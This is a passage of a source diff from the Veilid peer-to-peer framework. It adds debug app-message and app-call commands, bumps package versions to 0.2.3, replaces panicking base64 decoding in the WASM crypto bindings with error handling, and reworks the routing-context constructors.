.map_err(VeilidAPIError::internal)?;
|
||||
|
||||
Ok(format!("Replied with {} bytes", data_len))
|
||||
}
|
||||
|
||||
async fn debug_route_allocate(&self, args: Vec<String>) -> VeilidAPIResult<String> {
|
||||
// [ord|*ord] [rel] [<count>] [in|out] [avoid_node_id]
|
||||
|
||||
@ -1387,7 +1661,11 @@ attach
|
||||
detach
|
||||
restart network
|
||||
contact <node>[<modifiers>]
|
||||
resolve <destination>
|
||||
ping <destination>
|
||||
appmessage <destination> <data>
|
||||
appcall <destination> <data>
|
||||
appreply [#id] <data>
|
||||
relay <relay> [public|local]
|
||||
punish list
|
||||
route allocate [ord|*ord] [rel] [<count>] [in|out]
|
||||
@ -1465,6 +1743,14 @@ record list <local|remote>
|
||||
self.debug_relay(rest).await
|
||||
} else if arg == "ping" {
|
||||
self.debug_ping(rest).await
|
||||
} else if arg == "appmessage" {
|
||||
self.debug_app_message(rest).await
|
||||
} else if arg == "appcall" {
|
||||
self.debug_app_call(rest).await
|
||||
} else if arg == "appreply" {
|
||||
self.debug_app_reply(rest).await
|
||||
} else if arg == "resolve" {
|
||||
self.debug_resolve(rest).await
|
||||
} else if arg == "contact" {
|
||||
self.debug_contact(rest).await
|
||||
} else if arg == "nodeinfo" {
|
||||
|
@ -10,16 +10,14 @@ use super::*;
|
||||
pub struct DHTRecordDescriptor {
|
||||
/// DHT Key = Hash(ownerKeyKind) of: [ ownerKeyValue, schema ]
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
key: TypedKey,
|
||||
/// The public key of the owner
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
owner: PublicKey,
|
||||
/// If this key is being created: Some(the secret key of the owner)
|
||||
/// If this key is just being opened: None
|
||||
#[schemars(with = "Option<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(optional, type = "string"))]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(optional))]
|
||||
owner_secret: Option<SecretKey>,
|
||||
/// The schema in use associated with the key
|
||||
schema: DHTSchema,
|
||||
|
@ -6,7 +6,6 @@ use super::*;
|
||||
pub struct DHTSchemaSMPLMember {
|
||||
/// Member key
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub m_key: PublicKey,
|
||||
/// Member subkey count
|
||||
pub m_cnt: u16,
|
||||
|
@ -15,7 +15,6 @@ pub struct ValueData {
|
||||
|
||||
/// The public identity key of the writer of the data
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
writer: PublicKey,
|
||||
}
|
||||
from_impl_to_jsvalue!(ValueData);
|
||||
|
@ -4,7 +4,6 @@ use super::*;
|
||||
#[derive(
|
||||
Copy, Default, Clone, Hash, PartialOrd, Ord, PartialEq, Eq, Serialize, Deserialize, JsonSchema,
|
||||
)]
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
#[serde(try_from = "String")]
|
||||
#[serde(into = "String")]
|
||||
pub struct FourCC(pub [u8; 4]);
|
||||
|
@ -83,10 +83,8 @@ pub struct VeilidStateNetwork {
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
pub struct VeilidRouteChange {
|
||||
#[schemars(with = "Vec<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub dead_routes: Vec<RouteId>,
|
||||
#[schemars(with = "Vec<String>")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub dead_remote_routes: Vec<RouteId>,
|
||||
}
|
||||
|
||||
@ -100,7 +98,6 @@ pub struct VeilidStateConfig {
|
||||
#[cfg_attr(target_arch = "wasm32", derive(Tsify))]
|
||||
pub struct VeilidValueChange {
|
||||
#[schemars(with = "String")]
|
||||
#[cfg_attr(target_arch = "wasm32", tsify(type = "string"))]
|
||||
pub key: TypedKey,
|
||||
pub subkeys: Vec<ValueSubkey>,
|
||||
pub count: u32,
|
||||
|
@ -1,6 +1,6 @@
|
||||
# --- Bumpversion match - do not reorder
|
||||
name: veilid
|
||||
version: 0.2.1
|
||||
version: 0.2.3
|
||||
# ---
|
||||
description: Veilid Framework
|
||||
homepage: https://veilid.com
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-flutter"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
license = "MPL-2.0"
|
||||
@ -38,7 +38,7 @@ parking_lot = "^0"
|
||||
backtrace = "^0"
|
||||
serde_json = "^1"
|
||||
serde = "^1"
|
||||
futures-util = { version = "^0", default_features = false, features = [
|
||||
futures-util = { version = "^0", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
cfg-if = "^1"
|
||||
@ -47,10 +47,10 @@ data-encoding = { version = "^2" }
|
||||
# Dependencies for native builds only
|
||||
# Linux, Windows, Mac, iOS, Android
|
||||
[target.'cfg(not(target_arch = "wasm32"))'.dependencies]
|
||||
tracing-opentelemetry = "0.18"
|
||||
opentelemetry = { version = "0.18" }
|
||||
opentelemetry-otlp = { version = "0.11" }
|
||||
opentelemetry-semantic-conventions = "0.10"
|
||||
tracing-opentelemetry = "0.21"
|
||||
opentelemetry = { version = "0.20" }
|
||||
opentelemetry-otlp = { version = "0.13" }
|
||||
opentelemetry-semantic-conventions = "0.12"
|
||||
async-std = { version = "^1", features = ["unstable"], optional = true }
|
||||
tokio = { version = "^1", features = ["full"], optional = true }
|
||||
tokio-stream = { version = "^0", features = ["net"], optional = true }
|
||||
|
@ -1,7 +1,7 @@
|
||||
[tool.poetry]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = ""
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-server"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "Veilid Server"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -39,11 +39,11 @@ veilid-core = { path = "../veilid-core", default-features = false }
|
||||
tracing = { version = "^0", features = ["log", "attributes"] }
|
||||
tracing-subscriber = { version = "^0", features = ["env-filter"] }
|
||||
tracing-appender = "^0"
|
||||
tracing-opentelemetry = "0.18"
|
||||
tracing-opentelemetry = "0.21"
|
||||
# Buggy: tracing-error = "^0"
|
||||
opentelemetry = { version = "0.18" }
|
||||
opentelemetry-otlp = { version = "0.11" }
|
||||
opentelemetry-semantic-conventions = "0.10"
|
||||
opentelemetry = { version = "0.20" }
|
||||
opentelemetry-otlp = { version = "0.13" }
|
||||
opentelemetry-semantic-conventions = "0.12"
|
||||
async-std = { version = "^1", features = ["unstable"], optional = true }
|
||||
tokio = { version = "^1", features = ["full", "tracing"], optional = true }
|
||||
console-subscriber = { version = "^0", optional = true }
|
||||
@ -53,7 +53,7 @@ async-tungstenite = { version = "^0", features = ["async-tls"] }
|
||||
color-eyre = { version = "^0", default-features = false }
|
||||
backtrace = "^0"
|
||||
clap = { version = "4", features = ["derive", "string", "wrap_help"] }
|
||||
directories = "^4"
|
||||
directories = "^5"
|
||||
parking_lot = "^0"
|
||||
config = { version = "^0", features = ["yaml"] }
|
||||
cfg-if = "^1"
|
||||
@ -61,7 +61,7 @@ serde = "^1"
|
||||
serde_derive = "^1"
|
||||
serde_yaml = "^0"
|
||||
json = "^0"
|
||||
futures-util = { version = "^0", default_features = false, features = [
|
||||
futures-util = { version = "^0", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
url = "^2"
|
||||
@ -69,10 +69,10 @@ ctrlc = "^3"
|
||||
lazy_static = "^1"
|
||||
bugsalot = { package = "veilid-bugsalot", version = "0.1.0" }
|
||||
flume = { version = "^0", features = ["async"] }
|
||||
rpassword = "^6"
|
||||
rpassword = "^7"
|
||||
hostname = "^0"
|
||||
stop-token = { version = "^0", default-features = false }
|
||||
sysinfo = { version = "^0.28.4", default-features = false }
|
||||
sysinfo = { version = "^0.29.10", default-features = false }
|
||||
wg = "0.3.2"
|
||||
|
||||
[target.'cfg(windows)'.dependencies]
|
||||
@ -89,4 +89,4 @@ nix = "^0"
|
||||
tracing-journald = "^0"
|
||||
|
||||
[dev-dependencies]
|
||||
serial_test = "^0"
|
||||
serial_test = "^2"
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-tools"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
description = "A collection of baseline tools for Rust development use by Veilid and Veilid-enabled Rust applications"
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
@ -40,8 +40,8 @@ log = { version = "0.4.20" }
|
||||
eyre = "0.6.8"
|
||||
static_assertions = "1.1.0"
|
||||
cfg-if = "1.0.0"
|
||||
thiserror = "1.0.47"
|
||||
futures-util = { version = "0.3.28", default_features = false, features = [
|
||||
thiserror = "1.0.48"
|
||||
futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"alloc",
|
||||
] }
|
||||
parking_lot = "0.12.1"
|
||||
@ -49,7 +49,7 @@ once_cell = "1.18.0"
|
||||
stop-token = { version = "0.7.0", default-features = false }
|
||||
rand = "0.8.5"
|
||||
rand_core = "0.6.4"
|
||||
backtrace = "0.3.68"
|
||||
backtrace = "0.3.69"
|
||||
fn_name = "0.1.0"
|
||||
range-set-blaze = "0.1.9"
|
||||
flume = { version = "0.11.0", features = ["async"] }
|
||||
@ -66,10 +66,10 @@ futures-util = { version = "0.3.28", default-features = false, features = [
|
||||
"std",
|
||||
"io",
|
||||
] }
|
||||
chrono = "0.4.26"
|
||||
chrono = "0.4.31"
|
||||
|
||||
libc = "0.2.147"
|
||||
nix = "0.26.2"
|
||||
libc = "0.2.148"
|
||||
nix = { version = "0.27.1", features = [ "user" ] }
|
||||
|
||||
# Dependencies for WASM builds only
|
||||
[target.'cfg(target_arch = "wasm32")'.dependencies]
|
||||
|
@ -1,7 +1,7 @@
|
||||
[package]
|
||||
# --- Bumpversion match - do not reorder
|
||||
name = "veilid-wasm"
|
||||
version = "0.2.1"
|
||||
version = "0.2.3"
|
||||
# ---
|
||||
authors = ["Veilid Team <contact@veilid.com>"]
|
||||
license = "MPL-2.0"
|
||||
@ -15,7 +15,7 @@ default = ["veilid-core/default-wasm"]
|
||||
crypto-test = ["veilid-core/crypto-test"]
|
||||
|
||||
[dependencies]
|
||||
veilid-core = { version = "0.2.0", path = "../veilid-core", default-features = false }
|
||||
veilid-core = { version = "0.2.3", path = "../veilid-core", default-features = false }
|
||||
|
||||
tracing = { version = "^0", features = ["log", "attributes"] }
|
||||
tracing-wasm = "^0"
|
||||
@ -35,7 +35,7 @@ futures-util = { version = "^0" }
|
||||
data-encoding = { version = "^2" }
|
||||
gloo-utils = { version = "^0", features = ["serde"] }
|
||||
tsify = { version = "0.4.5", features = ["js"] }
|
||||
serde-wasm-bindgen = "0.5.0"
|
||||
serde-wasm-bindgen = "0.6.0"
|
||||
|
||||
[dev-dependencies]
|
||||
wasm-bindgen-test = "^0"
|
||||
|
@ -66,10 +66,15 @@ fn take_veilid_api() -> Result<veilid_core::VeilidAPI, veilid_core::VeilidAPIErr
|
||||
}
|
||||
|
||||
// Marshalling helpers
|
||||
pub fn unmarshall(b64: String) -> Vec<u8> {
|
||||
pub fn unmarshall(b64: String) -> APIResult<Vec<u8>> {
|
||||
data_encoding::BASE64URL_NOPAD
|
||||
.decode(b64.as_bytes())
|
||||
.unwrap()
|
||||
.map_err(|e| {
|
||||
VeilidAPIError::generic(format!(
|
||||
"error decoding base64url string '{}' into bytes: {}",
|
||||
b64, e
|
||||
))
|
||||
})
|
||||
}
|
||||
|
||||
pub fn marshall(data: &Vec<u8>) -> String {
|
||||
@ -246,11 +251,6 @@ pub fn change_log_level(layer: String, log_level: String) {
|
||||
}
|
||||
}
|
||||
|
||||
#[wasm_bindgen(typescript_custom_section)]
|
||||
const IUPDATE_VEILID_FUNCTION: &'static str = r#"
|
||||
type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
"#;
|
||||
|
||||
#[wasm_bindgen()]
|
||||
pub fn startup_veilid_core(update_callback_js: Function, json_config: String) -> Promise {
|
||||
let update_callback_js = SendWrapper::new(update_callback_js);
|
||||
|
@ -3,7 +3,16 @@ use super::*;
|
||||
|
||||
#[wasm_bindgen(typescript_custom_section)]
|
||||
const IUPDATE_VEILID_FUNCTION: &'static str = r#"
|
||||
type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
export type UpdateVeilidFunction = (event: VeilidUpdate) => void;
|
||||
|
||||
// Type overrides for structs that always get serialized by serde.
|
||||
export type CryptoKey = string;
|
||||
export type Nonce = string;
|
||||
export type Signature = string;
|
||||
export type KeyPair = `${PublicKey}:${SecretKey}`;
|
||||
export type FourCC = "NONE" | "VLD0" | string;
|
||||
export type CryptoTyped<TCryptoKey extends string> = `${FourCC}:${TCryptoKey}`;
|
||||
export type CryptoTypedGroup<TCryptoKey extends string> = Array<CryptoTyped<TCryptoKey>>;
|
||||
"#;
|
||||
|
||||
#[wasm_bindgen]
|
||||
|
@ -1,12 +1,6 @@
|
||||
#![allow(non_snake_case)]
|
||||
use super::*;
|
||||
|
||||
#[wasm_bindgen]
|
||||
extern "C" {
|
||||
#[wasm_bindgen(typescript_type = "string[]")]
|
||||
pub type ValidCryptoKinds;
|
||||
}
|
||||
|
||||
#[wasm_bindgen(js_name = veilidCrypto)]
|
||||
pub struct VeilidCrypto {}
|
||||
|
||||
@ -99,12 +93,8 @@ impl VeilidCrypto {
|
||||
|
||||
pub fn hashPassword(kind: String, password: String, salt: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let salt: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(salt.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
let salt = unmarshall(salt)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -125,9 +115,7 @@ impl VeilidCrypto {
|
||||
password_hash: String,
|
||||
) -> APIResult<bool> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -144,12 +132,8 @@ impl VeilidCrypto {
|
||||
|
||||
pub fn deriveSharedSecret(kind: String, password: String, salt: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
let password: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(password.as_bytes())
|
||||
.unwrap();
|
||||
let salt: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(salt.as_bytes())
|
||||
.unwrap();
|
||||
let password = unmarshall(password)?;
|
||||
let salt = unmarshall(salt)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -196,7 +180,79 @@ impl VeilidCrypto {
|
||||
APIResult::Ok(out.to_string())
|
||||
}
|
||||
|
||||
pub fn generateKeyPair(kind: String) -> APIResult<KeyPair> {
|
||||
pub fn verifySignatures(
|
||||
node_ids: StringArray,
|
||||
data: String,
|
||||
signatures: StringArray,
|
||||
) -> VeilidAPIResult<StringArray> {
|
||||
let node_ids = into_unchecked_string_vec(node_ids);
|
||||
let node_ids: Vec<TypedKey> = node_ids
|
||||
.iter()
|
||||
.map(|k| {
|
||||
veilid_core::TypedKey::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"verifySignatures()",
|
||||
format!("error decoding nodeid in node_ids[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<TypedKey>>>()?;
|
||||
|
||||
let data: Vec<u8> = unmarshall(data)?;
|
||||
|
||||
let typed_signatures = into_unchecked_string_vec(signatures);
|
||||
let typed_signatures: Vec<TypedSignature> = typed_signatures
|
||||
.iter()
|
||||
.map(|k| {
|
||||
TypedSignature::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"verifySignatures()",
|
||||
format!("error decoding keypair in key_pairs[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<TypedSignature>>>()?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
let out = crypto.verify_signatures(&node_ids, &data, &typed_signatures)?;
|
||||
let out = out
|
||||
.iter()
|
||||
.map(|item| item.to_string())
|
||||
.collect::<Vec<String>>();
|
||||
let out = into_unchecked_string_array(out);
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateSignatures(data: String, key_pairs: StringArray) -> APIResult<StringArray> {
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let key_pairs = into_unchecked_string_vec(key_pairs);
|
||||
let key_pairs: Vec<TypedKeyPair> = key_pairs
|
||||
.iter()
|
||||
.map(|k| {
|
||||
veilid_core::TypedKeyPair::from_str(k).map_err(|e| {
|
||||
VeilidAPIError::invalid_argument(
|
||||
"generateSignatures()",
|
||||
format!("error decoding keypair in key_pairs[]: {}", e),
|
||||
k,
|
||||
)
|
||||
})
|
||||
})
|
||||
.collect::<APIResult<Vec<veilid_core::TypedKeyPair>>>()?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
let out = crypto.generate_signatures(&data, &key_pairs, |k, s| {
|
||||
veilid_core::TypedSignature::new(k.kind, s).to_string()
|
||||
})?;
|
||||
let out = into_unchecked_string_array(out);
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateKeyPair(kind: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
@ -209,15 +265,14 @@ impl VeilidCrypto {
|
||||
)
|
||||
})?;
|
||||
let out = crypto_system.generate_keypair();
|
||||
let out = out.encode();
|
||||
APIResult::Ok(out)
|
||||
}
|
||||
|
||||
pub fn generateHash(kind: String, data: String) -> APIResult<String> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let veilid_api = get_veilid_api()?;
|
||||
let crypto = veilid_api.crypto()?;
|
||||
@ -254,9 +309,7 @@ impl VeilidCrypto {
|
||||
pub fn validateHash(kind: String, data: String, hash: String) -> APIResult<bool> {
|
||||
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;
|
||||
|
||||
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
|
||||
.decode(data.as_bytes())
|
||||
.unwrap();
|
||||
let data = unmarshall(data)?;
|
||||
|
||||
let hash: veilid_core::HashDigest = veilid_core::HashDigest::from_str(&hash)?;
|
||||
|
||||
@ -298,9 +351,7 @@ impl VeilidCrypto {
|
||||
let key: veilid_core::PublicKey = veilid_core::PublicKey::from_str(&key)?;
let secret: veilid_core::SecretKey = veilid_core::SecretKey::from_str(&secret)?;

let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(data.as_bytes())
.unwrap();
let data = unmarshall(data)?;

let veilid_api = get_veilid_api()?;
let crypto = veilid_api.crypto()?;

@ -315,9 +366,7 @@ impl VeilidCrypto {
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;

let key: veilid_core::PublicKey = veilid_core::PublicKey::from_str(&key)?;
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(data.as_bytes())
.unwrap();
let data = unmarshall(data)?;
let signature: veilid_core::Signature = veilid_core::Signature::from_str(&signature)?;

let veilid_api = get_veilid_api()?;

@ -354,20 +403,16 @@ impl VeilidCrypto {
) -> APIResult<String> {
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;

let body: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(body.as_bytes())
.unwrap();
let body = unmarshall(body)?;

let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;

let shared_secret: veilid_core::SharedSecret =
veilid_core::SharedSecret::from_str(&shared_secret)?;

let associated_data: Option<Vec<u8>> = associated_data.map(|ad| {
data_encoding::BASE64URL_NOPAD
.decode(ad.as_bytes())
.unwrap()
});
let associated_data = associated_data
.map(|ad| unmarshall(ad))
.map_or(APIResult::Ok(None), |r| r.map(Some))?;

let veilid_api = get_veilid_api()?;
let crypto = veilid_api.crypto()?;

@ -400,20 +445,16 @@ impl VeilidCrypto {
) -> APIResult<String> {
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;

let body: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(body.as_bytes())
.unwrap();
let body = unmarshall(body)?;

let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce).unwrap();
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;

let shared_secret: veilid_core::SharedSecret =
veilid_core::SharedSecret::from_str(&shared_secret).unwrap();
veilid_core::SharedSecret::from_str(&shared_secret)?;

let associated_data: Option<Vec<u8>> = associated_data.map(|ad| {
data_encoding::BASE64URL_NOPAD
.decode(ad.as_bytes())
.unwrap()
});
let associated_data: Option<Vec<u8>> = associated_data
.map(|ad| unmarshall(ad))
.map_or(APIResult::Ok(None), |r| r.map(Some))?;

let veilid_api = get_veilid_api()?;
let crypto = veilid_api.crypto()?;

@ -445,14 +486,12 @@ impl VeilidCrypto {
) -> APIResult<String> {
let kind: veilid_core::CryptoKind = veilid_core::FourCC::from_str(&kind)?;

let mut body: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(body.as_bytes())
.unwrap();
let mut body = unmarshall(body)?;

let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce).unwrap();
let nonce: veilid_core::Nonce = veilid_core::Nonce::from_str(&nonce)?;

let shared_secret: veilid_core::SharedSecret =
veilid_core::SharedSecret::from_str(&shared_secret).unwrap();
veilid_core::SharedSecret::from_str(&shared_secret)?;

let veilid_api = get_veilid_api()?;
let crypto = veilid_api.crypto()?;
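The recurring change in veilid_crypto.rs above is mechanical: every ad-hoc `data_encoding::BASE64URL_NOPAD ... .unwrap()` decode is replaced by a fallible `unmarshall(...)?`, so malformed base64url input from the JS side becomes a `VeilidAPIError` instead of a panic. A minimal sketch of what such helpers could look like follows; the real `marshall`/`unmarshall` definitions live elsewhere in veilid-wasm and the exact error mapping here is an assumption.

```rust
use data_encoding::BASE64URL_NOPAD;
use veilid_core::VeilidAPIError;

// Assumed alias, matching how APIResult is used throughout these bindings.
type APIResult<T> = Result<T, VeilidAPIError>;

/// Decode a base64url (no padding) string, turning a bad payload into an
/// API error instead of panicking. Sketch only; the error text is illustrative.
pub fn unmarshall(b64: String) -> APIResult<Vec<u8>> {
    BASE64URL_NOPAD
        .decode(b64.as_bytes())
        .map_err(|e| VeilidAPIError::generic(format!("invalid base64url data: {}", e)))
}

/// Encode bytes as a base64url (no padding) string for the JS boundary.
pub fn marshall(data: &[u8]) -> String {
    BASE64URL_NOPAD.encode(data)
}
```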
@ -3,70 +3,23 @@ use super::*;

#[wasm_bindgen()]
pub struct VeilidRoutingContext {
inner_routing_context: Option<RoutingContext>,
inner_routing_context: RoutingContext,
}

#[wasm_bindgen()]
impl VeilidRoutingContext {
/// Don't use this constructor directly.
/// Use one of the `VeilidRoutingContext.create___()` factory methods instead.
/// @deprecated
/// Create a new VeilidRoutingContext, without any privacy or sequencing settings.
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self {
inner_routing_context: None,
}
}

// --------------------------------
// Constructor factories
// --------------------------------

/// Get a new RoutingContext object to use to send messages over the Veilid network.
pub fn createWithoutPrivacy() -> APIResult<VeilidRoutingContext> {
pub fn new() -> APIResult<VeilidRoutingContext> {
let veilid_api = get_veilid_api()?;
let routing_context = veilid_api.routing_context();
Ok(VeilidRoutingContext {
inner_routing_context: Some(routing_context),
APIResult::Ok(VeilidRoutingContext {
inner_routing_context: veilid_api.routing_context(),
})
}

/// Turn on sender privacy, enabling the use of safety routes.
///
/// Default values for hop count, stability and sequencing preferences are used.
///
/// Hop count default is dependent on config, but is set to 1 extra hop.
/// Stability default is to choose 'low latency' routes, preferring them over long-term reliability.
/// Sequencing default is to have no preference for ordered vs unordered message delivery
/// To modify these defaults, use `VeilidRoutingContext.createWithCustomPrivacy()`.
pub fn createWithPrivacy() -> APIResult<VeilidRoutingContext> {
let veilid_api = get_veilid_api()?;
let routing_context = veilid_api.routing_context().with_privacy()?;
Ok(VeilidRoutingContext {
inner_routing_context: Some(routing_context),
})
}

/// Turn on privacy using a custom `SafetySelection`
pub fn createWithCustomPrivacy(
safety_selection: SafetySelection,
) -> APIResult<VeilidRoutingContext> {
let veilid_api = get_veilid_api()?;
let routing_context = veilid_api
.routing_context()
.with_custom_privacy(safety_selection)?;
Ok(VeilidRoutingContext {
inner_routing_context: Some(routing_context),
})
}

/// Use a specified `Sequencing` preference, with or without privacy.
pub fn createWithSequencing(sequencing: Sequencing) -> APIResult<VeilidRoutingContext> {
let veilid_api = get_veilid_api()?;
let routing_context = veilid_api.routing_context().with_sequencing(sequencing);
Ok(VeilidRoutingContext {
inner_routing_context: Some(routing_context),
})
/// Same as `new VeilidRoutingContext()` except easier to chain.
pub fn create() -> APIResult<VeilidRoutingContext> {
VeilidRoutingContext::new()
}

// --------------------------------

@ -87,6 +40,16 @@ impl VeilidRoutingContext {
APIResult::Ok(route_blob)
}

/// Import a private route blob as a remote private route.
///
/// Returns a route id that can be used to send private messages to the node creating this route.
pub fn importRemotePrivateRoute(&self, blob: String) -> APIResult<RouteId> {
let blob = unmarshall(blob)?;
let veilid_api = get_veilid_api()?;
let route_id = veilid_api.import_remote_private_route(blob)?;
APIResult::Ok(route_id)
}

/// Allocate a new private route and specify a specific cryptosystem, stability and sequencing preference.
/// Returns a route id and a publishable 'blob' with the route encrypted with each crypto kind.
/// Those nodes importing the blob will have their choice of which crypto kind to use.

@ -110,7 +73,7 @@ impl VeilidRoutingContext {
///
/// This will deactivate the route and free its resources and it can no longer be sent to or received from.
pub fn releasePrivateRoute(route_id: String) -> APIResult<()> {
let route_id: veilid_core::RouteId = veilid_core::deserialize_json(&route_id).unwrap();
let route_id: veilid_core::RouteId = RouteId::from_str(&route_id)?;
let veilid_api = get_veilid_api()?;
veilid_api.release_private_route(route_id)?;
APIRESULT_UNDEFINED
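With these changes, `importRemotePrivateRoute` takes the peer's route blob as a base64url string and `releasePrivateRoute` takes the route id as a string, and both propagate parse failures with `?`. A hedged caller-side sketch, assuming an attached node and a context from `VeilidRoutingContext::new()`; the names below are illustrative:

```rust
// Sketch only: assumes `blob_b64` was published by a remote node.
fn use_remote_route(ctx: &VeilidRoutingContext, blob_b64: String) -> APIResult<()> {
    // Import the remote route blob; the RouteId can then be used as a target
    // for appMessage()/appCall().
    let route_id = ctx.importRemotePrivateRoute(blob_b64)?;

    // ... send traffic to the route here ...

    // Free the route when done. Passing the id back as a string assumes
    // RouteId implements Display like the other key types.
    VeilidRoutingContext::releasePrivateRoute(route_id.to_string())
}
```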
@ -121,7 +84,7 @@ impl VeilidRoutingContext {
/// * `call_id` - specifies which call to reply to, and it comes from a VeilidUpdate::AppCall, specifically the VeilidAppCall::id() value.
/// * `message` - is an answer blob to be returned by the remote node's RoutingContext::app_call() function, and may be up to 32768 bytes
pub async fn appCallReply(call_id: String, message: String) -> APIResult<()> {
let message = unmarshall(message);
let message = unmarshall(message)?;
let call_id = match call_id.parse() {
Ok(v) => v,
Err(e) => {

@ -139,10 +102,43 @@ impl VeilidRoutingContext {
// Instance methods
// --------------------------------
fn getRoutingContext(&self) -> APIResult<RoutingContext> {
let Some(routing_context) = &self.inner_routing_context else {
return APIResult::Err(veilid_core::VeilidAPIError::generic("Unable to getRoutingContext instance. inner_routing_context is None."));
};
APIResult::Ok(routing_context.clone())
APIResult::Ok(self.inner_routing_context.clone())
}

/// Turn on sender privacy, enabling the use of safety routes.
/// Returns a new instance of VeilidRoutingContext - does not mutate.
///
/// Default values for hop count, stability and sequencing preferences are used.
///
/// Hop count default is dependent on config, but is set to 1 extra hop.
/// Stability default is to choose 'low latency' routes, preferring them over long-term reliability.
/// Sequencing default is to have no preference for ordered vs unordered message delivery
pub fn withPrivacy(&self) -> APIResult<VeilidRoutingContext> {
let routing_context = self.getRoutingContext()?;
APIResult::Ok(VeilidRoutingContext {
inner_routing_context: routing_context.with_privacy()?,
})
}

/// Turn on privacy using a custom `SafetySelection`.
/// Returns a new instance of VeilidRoutingContext - does not mutate.
pub fn withCustomPrivacy(
